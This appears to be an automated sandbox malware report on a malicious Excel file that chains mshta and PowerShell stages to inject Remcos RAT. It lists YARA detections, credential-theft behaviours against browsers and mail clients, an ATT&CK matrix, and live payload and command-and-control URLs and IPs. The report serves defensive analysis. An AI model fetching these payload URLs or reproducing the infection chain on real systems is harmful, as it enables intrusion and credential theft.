                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,25_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,31_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041739B GetVersionExW,24_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data31_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db31_2_0040BB6B
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword25_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword25_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword25_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1052, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe31_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts11
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts23
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts123
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Install Root Certificate                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares21
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model211
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts4
                  PowerShell                  		Network Logon Script322
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets39
                  System Information Discovery                  		SSH4
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Security Software Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1533041 Sample: 037002451082_10142024.xls Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Malicious sample detected (through community Yara rule) 2->114 116 22 other signatures 2->116 12 EXCEL.EXE 59 33 2->12         started        process3 dnsIp4 98 192.3.220.40, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 12->98 100 jfm.com.co 150.136.81.248, 443, 49161, 49163 ORACLE-BMC-31898US United States 12->100 82 C:\Users\...\037002451082_10142024.xls (copy), Composite 12->82 dropped 84 networkthinkinggre...gstobeenough[1].hta, HTML 12->84 dropped 156 Microsoft Office drops suspicious files 12->156 17 mshta.exe 10 12->17         started        21 mshta.exe 10 12->21         started        file5 signatures6 process7 dnsIp8 86 jfm.com.co 17->86 118 Suspicious powershell command line found 17->118 120 PowerShell case anomaly found 17->120 23 powershell.exe 24 17->23         started        88 jfm.com.co 21->88 27 powershell.exe 21->27         started        signatures9 process10 file11 76 C:\...\seethebestpricewithgoodcookiesm.vbS, Unicode 23->76 dropped 78 C:\Users\user\AppData\...\sknmngfy.cmdline, Unicode 23->78 dropped 126 Suspicious powershell command line found 23->126 128 Obfuscated command line found 23->128 130 Suspicious execution chain found 23->130 29 wscript.exe 1 23->29         started        32 powershell.exe 4 23->32         started        34 csc.exe 2 23->34         started        37 wscript.exe 27->37         started        39 csc.exe 27->39         started        41 powershell.exe 27->41         started        signatures12 process13 file14 146 Suspicious powershell command line found 29->146 148 Wscript starts Powershell (via cmd or directly) 29->148 150 Bypasses PowerShell execution policy 29->150 154 2 other signatures 29->154 43 powershell.exe 4 29->43         started        152 Installs new ROOT certificates 32->152 72 C:\Users\user\AppData\Local\...\sknmngfy.dll, PE32 34->72 dropped 46 cvtres.exe 34->46         started        48 powershell.exe 37->48         started        74 C:\Users\user\AppData\Local\...\lrugk233.dll, PE32 39->74 dropped 50 cvtres.exe 39->50         started        signatures15 process16 signatures17 132 Suspicious powershell command line found 43->132 134 Obfuscated command line found 43->134 52 powershell.exe 12 4 43->52         started        56 powershell.exe 48->56         started        process18 dnsIp19 90 raw.githubusercontent.com 185.199.108.133, 443, 49167, 49176 FASTLYUS Netherlands 52->90 122 Writes to foreign memory regions 52->122 124 Injects a PE file into a foreign processes 52->124 58 RegAsm.exe 52->58         started        63 RegAsm.exe 56->63         started        signatures20 process21 dnsIp22 92 idabo.duckdns.org 58->92 94 idabo.duckdns.org 135.148.195.248, 49173, 49174, 6875 AVAYAUS United States 58->94 96 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands 58->96 80 C:\ProgramData\remcos\logs.dat, data 58->80 dropped 136 Contains functionality to bypass UAC (CMSTPLUA) 58->136 138 Detected Remcos RAT 58->138 140 Tries to steal Mail credentials (via file registry) 58->140 144 7 other signatures 58->144 65 RegAsm.exe 58->65         started        68 RegAsm.exe 58->68         started        70 RegAsm.exe 58->70         started        file23 142 Uses dynamic DNS services 92->142 signatures24 process25 signatures26 102 Tries to steal Instant Messenger accounts or passwords 65->102 104 Tries to steal Mail credentials (via file / registry access) 65->104 106 Searches for Windows Mail specific files 65->106 108 Tries to harvest and steal browser information (history, passwords, etc) 68->108

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  037002451082_10142024.xls8%VirustotalBrowse
                  037002451082_10142024.xls100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  raw.githubusercontent.com0%VirustotalBrowse
                  geoplugin.net0%VirustotalBrowse
                  jfm.com.co0%VirustotalBrowse
                  idabo.duckdns.org2%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.imvu.comr0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  http://go.micros0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://login.yahoo.com/config/login0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://www.imvu.com0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%VirustotalBrowse
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%VirustotalBrowse
                  https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                  http://acdn.adnxs.com/ast/ast.js0%VirustotalBrowse
                  http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF4%VirustotalBrowse
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%VirustotalBrowse
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%VirustotalBrowse
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  raw.githubusercontent.com
                  		185.199.108.133
                  		truetrueunknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalseunknown
                  jfm.com.co
                  		150.136.81.248
                  		truefalseunknown
                  idabo.duckdns.org
                  		135.148.195.248
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFtrueunknown
                  idabo.duckdns.orgtrue
                    		unknown
                    https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squidfalse
                      		unknown
                      https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgtrue
                        		unknown
                        http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htatrue
                          		unknown
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          		unknown
                          http://192.3.220.40/450/RRFCCE.txttrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://b.scorecardresearch.com/beacon.jsbhv8F64.tmp.24.drfalseunknown
                            http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaCKWWSmshta.exe, 0000000F.00000002.479646263.0000000004C40000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://acdn.adnxs.com/ast/ast.jsbhv8F64.tmp.24.drfalseunknown
                              http://192.3.220.40/viderImshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.imvu.comrRegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://jfm.com.co/emshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv8F64.tmp.24.drfalseunknown
                                  http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaccepC:mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://ocsp.entrust.net03mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv8F64.tmp.24.drfalseunknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000018.00000002.493794174.0000000002688000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv8F64.tmp.24.drfalseunknown
